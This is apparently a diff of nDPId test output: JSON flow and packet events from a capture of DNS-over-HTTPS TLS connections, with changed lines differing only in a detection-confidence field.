04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":946739349012,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739349012,"pkt":"ZmZmZmZmRERERERECABFAAuAVvpAADYGOMgtmbtgCgAAAQG7lIKfbuPaCXxTn1AQAIO1KAAAFgMDAHoCAAB2AwPVEzRRR6mT0E92uybAnGbGZWeWVD\/m1\/eNOhfsedWm3iCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/hMBAAAuADMAJAAdACAZ+iIImd19O1rP7adwYQe9xC\/+1jN6jL9eBLofHG6SbQArAAIDBBQDAwABARcDAwtedm5F60tr1KSpSWgXMdmmX3Ys4sUEWudZbc\/GVmqkUsaepFDQQ8mcPIjegsJEHlTqywqGyBqt0c8EFI9PK3y9wMc\/+3ozr1s1L0Jd42MTaMhOndcbb8aYEnSYi\/zIVpLn6qdOkfyxUEfDDwQC7tdpz8rWkLOD8s1Gc\/+GapP01LuZUSoxJKMEPFivq1rS7ax5uSaTQJul+x0Q1A7WKBQI96lxNlKhu8S\/F6aiQdLb9bng9LygmgdlJ0IMNTAzSle754kwT44x6hxHdY+dgL3FfpB162mfDfNtflZ3mHhPTnkpYtlwwqsdseLzRBUZP3Q4Ja18aDfnLKv6lwZqUkYqVbKbxYZxo1iV+7HgYRo00AC9h97+\/fjdDvQp1\/ZlgGZVor6fI\/2UbNyKd+CKXq\/WxiWd3cfOC5mfsohQgZfh0mCkf9dr3uz3ujKCV4y2skvjk\/nvMYWaCk8YYJ09fpkBhHkvDLX34BQkxdq8SFFlf9KC0xLeicU3h\/prF3BxKbFcEuJVsTQ1IwCvvKPttu9bXK5Pot+r5ctGacxaL2PbnIguGLNO3oXuqP1Q9c+9bIOgs3SrVqvTzY6u7z71LwLT4lIRUT1tdFuzNBsI3uP36b\/9IAg3kdqQ6B86AhSq6s9YI9cVyIl6Ij\/v4hTBVX3z6+HeVN1ZOCnsTQ5pzdsr1wh7Urw2Dq8ujiDkOD+Fou6dMOYoID0SKEwKKw1eszHLhxLaCFy\/r3d7Go4MVMtt3WT79fbDbeLxIVt3hgCghutkKtcuHd5chD4oLWELh6tM9hPl+4nCK4m\/+O5cbKg6OL6jCTY\/gO0DykmoFGAjlffWT5qFPKGIHd1y6jfLFBTeg895J4XJsRYeS8WWpPvi7T\/OrrEOEoSups8MYg4y47m6jBSiviaU3Egrqb9OmbARusmAkBOc+b7sPEV3vJ7rmbEmSmp9es6Ma1hTLKZ1zLv5y87EpErdv2GmabDERgys3rQli1zICByjjT3wKTtOmnCFVus\/kEZ20ZKIT3R1SBoRFrSMK3NkxEq+liNvGGcf+EHNQ14qDPBLs0m+Amz59cCkIeFxK62ZDg\/D8+8JoEQZlyE9AWaFti+8vDVxBObTHdc9i3Kw7ewteJw63QBC9EWl8n8clagy9wb+UFjl1FNsicAfIiO1Xs\/Zye+Z2EVvEt6aOGsYYXUIiuSHHHy+OTANd5q6FtSmxH5d29V\/RRYtUF+RFNqvu7jCJbpfY4CMi\/uFQpCXgIsM\/FuZw9ietB43gXYBJPigmUjQOJrnl2aOEVZN25twSZkyFkDyfGhTbcdXECqNFF8TnC98sE4z4cS
yaAj5eIgD8KWiILJX2yoi+dB+VLGxM9ljCfyywhEqQD9FxwMPenX20RdEq43Qg2oM44SbTOcaPyRK5R1+UoArEareBxTtwbIj1\/gYPRWTkZ8pK7ELTpeDzq5dz0ptJVwSUIH0JdKkVE3RFHc7LCdWysSVUeFYgHXl28Deq1y2qizxSTQTQGj788zPkj9nRqwsew3ffxErP0pR2erOmxzmRPzUcbJ79H2yupuK1CFndSabVcPzkp0n+2KlKx3Rn8tyf\/hn5qm64LAaVaGFpUoNBQQlUEAUYg9kdMVxRV9nD92+mrKa+2JReRncweAA5LhgzrfrEPwyc1B\/FBpBxwIyV7Xy5RQehy\/n+t2tqgDOZsROSPZV\/c502uShsqQ80dFUM5RKxh0mzHQFM0OK4kAUJhq4wyFBHR892ibgw3EufqDFUX7y2fDW3v9sHJ0PjEBQf0Z+LPQlMJXmUS7wgfHtNIgpjboq9\/XXfFayEzII5Ncg7bWrTiyo4JZFWiVHcfds+TlAJ90V8nR81jNjJjiPpWGiw\/wBoLReBkDgcemdC73ykLweu4Hz14TsLOSuTZsu5EZr2HV10q+61hH6ogeRQcst3XaFzwE6kceLYfEcwH6tnp0hMB9x62cNInT6JQ8Ps6Dsa1MRUtnCTsYL1E0KIBY7R9nY7dSZJpv6\/qCWpPnVEfxATo177u2nsXiV3PW6LNV3vcyinTzbbKWNsqHSX\/Rxrwf+OdHXgpeBX43CwbB+Rl\/n0BchEVnzKV702Gf9HUv7cdBb0q\/i8hYFIFBzZttYWXxvMMCuX5vFFfZ+rdfdvsqESgmVU60GNMEWlpOcj4wiK5O4Sufp7t63lXuXFEGAyK\/zCX6bTsoTK5InJmYeoxH7z6vro\/3e6Rs6NXLtea8yb94qYkPEVBEqGEipZDsyb\/R\/lWwE43D7Aub6g9hkVbl53hLJGZnLMYjNGkky7jnCfZMKDiaQ3bMKv84lVUSDkp3sK9qeuBF1mmZVLhv9HAxir3SYBNQzWsBGcCUpO9xkV8FP0kj\/iTW\/FfLKk\/DKd+BUjaxMV2uhSSQCmVokip5q8tl9J4DEAniFz7fyP2MXZu9ul4s+9NyHUnr96E7oyJz9targa6lIbTNrabDpef+RQ95Jg3dEACMFcNChtfiB\/b3jxW+VTLzdeEUKMhmN9RiB66l3ilE2UeLuKgX3mDdaXzGma9QHxu929MG9uV3gmQHGDy5TCH2vSSxC6z2\/OmzDacBVelfY5Epw7lZBVVGZZnkHXtDZ9aRkPwQ5ycPlis7xyXgrmjnzVXCU2sPi4g8aIZETiD58CL1o5eQFVuuBNN+YXqwNw72pWFPr7n1hEhwv6Vw12CTiC6plOVTlmWo7Hq2\/pHWhiu+RR5lh+vtYdVwTRC30+fnyRct1ka9vbNMqvCrrwxYa5D5R79sdMZcHtogzlIhlvBA\/hEtCrwDCOTsOVV\/YHdG3yKWN4O6RFwnZZifYo9t6777XaaqBBnRbmAIh24x\/s0cQdV+c5CkmqhwnyVXuFfH9t0XQ1553XL2pziV2ZWgjNschuXZ58zhktYtAMF0VjgYyEW7jDxhCpc\/J+cRaztT52A0ytvkRgmQaVyJn+aLdW9sCq3AlQ8gfIfMUsOa4qrrfYi\/W6wC7p\/JpUVApLzH2mKuhH3cCajbIykaOD4hdj7uAYv5ROV\/V+1+PXMG5ia\/9hbHOgDJFO9d9IqY7KSn3C+1mBqumfNrcdhFQFiTH43iJKL7gLi6km2zN5cYKZjrmjbjv3JkWSUwYRpPDfBjgX5JiTKnp6do79w4bx6CpetzdKmLMsuX1smdlFu3kujpvbqv6a1KH6F4pTm1MQ5RJmmfgdquxg6OsIIvP\/kEDn+LVg8ZMm87yYyquFkOWwe1Uj\/Vi3kL4fPIR5niD5XVoEWohLwDdVCqKts+2P1GYyEHqQAMrqWmQegZl\/LhTQw4INPlPDFE
m0yb+KBOh00ktbHzCM3CFPGnzYO3alldd67nq954eKLkUOGB9MeSY7cUwdbulO4dr11zq3CmOecqOMxOt2f\/VIopIebzlUenef+vRdxbO4ewVSqUhsy+yoPWXBOpZPgLhhY3LxBP7ooDeCCIO0lcZB\/CBSyUEgiFK4lZ3kAGz8uFt3A\/vRHHEykEvXspKCwmakvQLGtne7shF+m0j\/3K2vxEjTMcnD1pU47tDCPXW32n5d+GKj1kQXvMBCTdCNuO1i0NSTDkuKc7j5+f6O6RyusC0fFzTP7MVdbXFBb1omPMQEuUSj0+hj0rK73sjeV5xq8OVFpFoURjJ2NwQsCAu\/jAm112150nTKknyPg+N6HqbvoOC0Wpkh7IwnBnV+fSTZjZ4AEkEeoKm"} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348961,"flow_last_seen":946739349012,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739349012,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348961,"flow_last_seen":946739349012,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739349012,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":946739349015,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739349015,"pkt":"ZmZmZmZmRERERERECABFAAC4VvxAADYGQ44tmbtgCgAAAQG7lIKfbu8yCXxTn1AYAIOAngAAUbudk7Sx467B78RwxwixN7WbszxDSJth5tiFKuiBrGoB9KFJtYBVt1C9rFJk5PyiCKlQsUVoHGHAH28fXEOq226wLx4N\/Z5eAHXlqMB6V1mSenxLPr5ItjgHCvxui0hIr8CHs4BD\/dcyFi\/lJAfYyCLIMg195o3ptTftZf8UL\/yW+5j1eIJyx2wYxG1Bmojg"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946739354159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739354159,"pkt":"REREREREZmZmZmZmCABFAAFFsX5AAL0GP4sKAAABuetRAa5gAbtwXMMeYngARlAYAfbM4AAAFgMBARgBAAEUAwPEqi+8SizamcFZuiOMoqnZy7ZEtN03UH+nij+VYBL3GiAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIAlFpvTRrkboC35Gi6Kti1ZQzFT3L63Tg7Ad2VS1Z0Nh"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946739354179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739354179,"pkt":"ZmZmZmZmRERERERECABFAAxSLpJAADQGQGu561EBCgAAAQG7rmBieABGcFzEO1AYA+rX7QAAFgMDAHoCAAB2AwNebHWZixx0UeVpRBPFfxfOwpvxbfyV+ENeQi\/Un6YmQyAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3BMCAAAuACsAAgMEADMAJAAdACB1L93FSUikFZRCKYl+OoNXGHhZBDYuCiNIjz\/6VCChXhQDAwABARcDAwAgdZlJOwY6+pChCwvT27tLGZnet+yerzqND\/r13r3OLdQXAwMKE5aV9MRHEDXFawxN2Z6ZXTlxr30g5cib8A44fkQ64oQQPk\/j2rM6co+1b6nblkLeVstFbtdteXwKa840eY9TBhZcpregM8Gpq1oOWaP3aNoy3x0m7PtgdMXWTRJ7rBzMj95YpQgnRNENvlH3xRXTNJuz0OfawrfLZMK40dTY8qdEtSvVWaOv58OBFTZzds8x7Jv0lUMqTicPkVrWkLGPasMnh+a2IVbs4dzr6AhsFrB+RZ1Cwi3B7S6zzr3HKx3FQGuVtHh19izb6w3PsdZ173iclTsS5Bteswb+0EdgltfMU7tCCWlZhlMw5cbiqzX6GLMdzRL4kMNW6gZ94dTc92SBIwy+nEoGbWZhqTeDuHiAUARf+gliy5YoFjW\/PRAypf
5PMRtEZClIDkjH3prUoCFGtLR5uf4Ro0aKo3ih\/KCyAGbVEIvG4bDrcfRxO0cIiVz1g0D8AUPbTDsJO+EPspEYZgIriHIBYFx\/k\/flIHH3EjcpqIe+X8XzMf\/XqWL46qAhN1cBUZXyVc3ZIhpeJ7ZcaAbPdH2pnTMTM+2Go4igirnaKWq3AflEDkSSdueX+UQOyAZUkd6Z\/x1Mwq9Tb7hXL6vtOYcRcpywMzYkakngWETbQss0CojZbN6WAPS\/E+Yya6CgGI5Mt3dulPgu8jNdumumeB1P2glp9qwQHuvHZ1QS+cPtS5x1raYCp7T5sLegZ7EBanNjOEnVAU4IhPuW0ciFUM9Mj\/BzgDWE\/hUdNhPhhQjiaUBq7VyAXKWvyO4Dx2Fel0gu0u32uA\/SHIYv4dBAj17ghhBMv+sGNC8NMtNWhv9aqIp0FgaNgTJ0u6ZahzAQoaba8gKEvhS9MXrxWiCXAHjt1VsuslTiTWmDXRn19O8C7v9DYdY\/x+ZHYaRltrJ+iDZDtT011nG9MjUMy2gT88psevKL0b5pLEr8mJZKye0N3pZbPCi7mofLMsInUgCJYAIJe6z94EV17S9g5MdytiaRjgrDRHDrubquER\/+3IoTeZlSES8Dx7zlXZ1xB0O+hR5nXJGyIskMCiVwzAersZ9n8hiUAXpNADMi79ZOaHWxepo2ogdjtLk6L5RJOzsW\/4O9s\/bE+P+1smYJ8Xz\/vrKCk0smpZMpgO1UV8s8gCIdy3Fy602DcQY72cCEk\/bea7v72CbMggpz6myeQuHNx9T5ZrAHxOyDqp4pkMAhTfD0dC3xg5zkOkSQr5pJx6ievuDl8+wenRgTssVF8J1H1XRwU56YwKhMsgqTn8eD+cywTh5zCo9dNvl9ZfHWmV3Mdg4aJz1dYzmdkUhSu46Md5G4HmOnLwI\/XQbyhHcZ2WUU9mvD9BvjP9kn2RjUXcRT+d\/cwjt2Esxb2ENHpq2bs5raN\/CIbWH\/kUQRUUCpYL9CdmiBZpRtJPrOXy6iWAKofUme88d2tr7pTpEzcTLRU5BoYhPgOVQbcXw1q3yaTUVQB4Wvp1Zu7ruywhz7ujDaUupe4ypGeBHoMNq\/GonbnedBdKUd5q1Hau\/cYgTRejjU\/rutBsmd1TsWFTtw4Narsizl07q94yxV1+nrTG1gDq+RefJI3JM3SA8ccXZmrC6\/9FsgFjt+2cDWt4JB10cFksHu2\/ml\/dASyc2jx2disClcngjvd0YpBOF1xYxILWWqUHc2SCZLZ2Aroa1pMW21jKFGB4Ar1xpSSuVVcPsSSozoKj4\/j0FvDgtwJoY1rK5ezs7yUOh0iG7\/TmlCa9VwcqKlbka3ucK+EV23eB8BAhdfkU1ZRvrzop+h56cTHnAqdzA+huEFkYic20FxEaceaf8SUoyM1\/uxur0377YEwqxCUCLmkpdjf2hKaG2o6w6dX9vCExiNhM2Jlol1IlMb4fWmsojPIiIMoMr4vCBzw+JJJUMfUwOy6sleF+nP5muuQ5rVTMwbb+OCuGE2jDpUYai822DbFN3NNQkq3i2+StVf9WCISeMMwfPk+unXE38SgIx+97\/gooknQY70IX3TsgQKFcc1SEcM6rgwk5pR4rwHfer1xQNsM1RKZGf8xeZa+ag2yg\/IxDT4LymayHchHxdaigJz4AcxjPrNuXaoi2s3E1xPh2H1clb\/ZJJwrzY7BZjc1TQovWjOw6wm8GHMHRYPWaLpFhaLJX6iixp0BBfYBFzNmIvcsaGPhpGQIWG8LNHl1vR+XYpcJzMWemerQw5\/TiIwzhe4xLQ3Ee69tOX2fKhT1GAVUyB0oeuLgjlb0FpWzQ\/lyORIy\/GJNnRuRgdZy8RNv03eZWNeLTHNU8amNvoSqoCJx28QcG4ZFWjkiBlGlisQg9MS7LfxB5YDcM35ukvbr57gX64nw00G3GJe5JnYnqeIHNIuWQI7
nvVvBHP3PfWTKRa21nyK90D70j+bxIjA68ylRrcDSlrq9zK60l62NWR551fMFXxuoHTFc7qQ+K4J0ESDuqw7x47BFgsRGeVuVNYexUC0TU1lBMwcu9BGg+0G0+duPvOP3aW+jzZAhqEMopcx946w0BTw\/+bJ5qiZX+nSvNF+IzKPfnXq7G+okmmjpg\/ianwcwtjvgrAC4pnZGY+m\/27CyJiTEi9fYvN2T1KGpFt19LfH\/UKHKmZdKRHhHpgpAUwyz0ixR7JCGsZBCNp7SmZtoObLBfKyYFLS1OdeJn33VC7QU5ZIB0TIGMOnasD1IIceFavDDD1uWjFat9U8TSvdQkrVOP0H+iiog+bscrfkzNeLsrOj5JaS96ZDARUESAXVBQE+wq3Z0J6WrNdNJCanh0R13lIIfbBO3tp1JQaYJcU43NTOBatEStIgR6pggN4HF+DO2dNPqB6DJlllwkNWiMSwaSg\/Qokswn+fLJvn7pPXb8ILKczNLht2jz9aEp0+I8QfJ9sljCRmG\/qdZknc3MVkUZCxQWgeYvnw16OCgKVrO7aXg97ZXgFQywgIz4XcG4cQlmlUgZ5vBckLpEq1wb47O2DC7oYeIkB7WvMn7pIP5qKMmIewtCOip18QV5mNZQ7kfdTHrJyhNEAXbfaMkBbJyAVJGCBIYwvhIF13Izb7B6Cmnolxq1r5eurWQOB44xUuJop6m5Nm5hxmATag\/xOQnBP8r2vNMxUihmUT8anHH3UfjXAY915xtFCA13IdATjUK5r\/nOjWuYELtJmgRJ2oeyJFl+xU3enOifKqvSW9w3npBMuO6+ND+s2KXgdXZpDonBBs70SsK8NzgIT\/8A0se3txfhbwpY2EseDOLiVbMtTN8WhjrhnZpDEjzwdCV8jV8ki7+xTW6Ae32nBN9uRAZ20gpXPNrrgk+1oPaXal74NAuojgux90nmy7fGQvJ\/CCkJUFP2+xt7moAmNV6Bvh9GIV51tdhbag9+AtGmBI8WUGXz9QPwduT4nOO+Ia6cTJuP1+CL3tb+p6ijB1Jg583CQ8vtkm3Pw8NXcvYMcBOIpsKkRrBsD67+irg6nQFwMDARkSIsFlIX96rBVOSHF8j3nD4OzTmAKQfrZ20qhfNZw8PH0q41dWeUeDXwstCBpDPbSnxrC2ED\/1S7AKbK3628b0BuTXrCb9vI9IIN\/fjnNzXGCyCTfNGyQC7Z2s3ZZgGilAyQTgWS6IBv0X\/cXimIPEtNGeEgUfHp2ZiHChqtgUwdJbYZhYRpk9Vh4PP\/G\/geKDMJuF9LkfMNZa2A5\/kJwnnbAN+9JGdzxyQUZGqq8DCQqxQ4uAbnIJmcLNJBx9PHCzhhj8vk0E7hUaqEkvClX1iiIhNhFlmQ9FsqBvx5KYUvaVI86YI314BKZUdBn0Gn9Psqh3g3PCqYbuhSA+KXAHAB6ifkPpQbZxhpKA+yQN\/aKxaWBvyR8fvBcDAwBFUlHyM0i8aQGJ+PRPScWQmM6JruXTVxzLP2v5t10WMRjAfhtdK+kbZwmOwuBqS0fXovjROfDM5rGu95fh\/DYXUBWZSAER"} 
-00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739354159,"flow_last_seen":946739354179,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739354179,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739354159,"flow_last_seen":946739354179,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739354179,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":946739354182,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739354182,"pkt":"REREREREZmZmZmZmCABFAAB4sYBAAL0GQFYKAAABuetRAa5gAbtwXMQ7YngMcFAYAfXMEwAAFAMDAAEBFwMDAEWXq32pwHEzhcGDp\/NKLjvxgMAkksKxKcFIOFCDodEb90S6h8Gu0G\/BLuFfZ5sttQB7HESBT0tBjYEfHL61VthvR6QOjls="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946739374011,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739374011,"pkt":"REREREREZmZmZmZmCABFAAFF9DpAAH4GIdcKAAABdMqwGqhiAbtWR3H7NJTy0VAYAfbm2AAAFgMBARgBAAEUAwO\/FCTCx\/QYlyW+S6EGE0TFYQ1H3k3FO+5pvJMM4NWMBSCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKpgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmxpYnJlZG5zLmdyAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIOxloY7MOWvSgZ3hQaojp9inJ84Sw+igf7hW9Y3pU+ch"} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
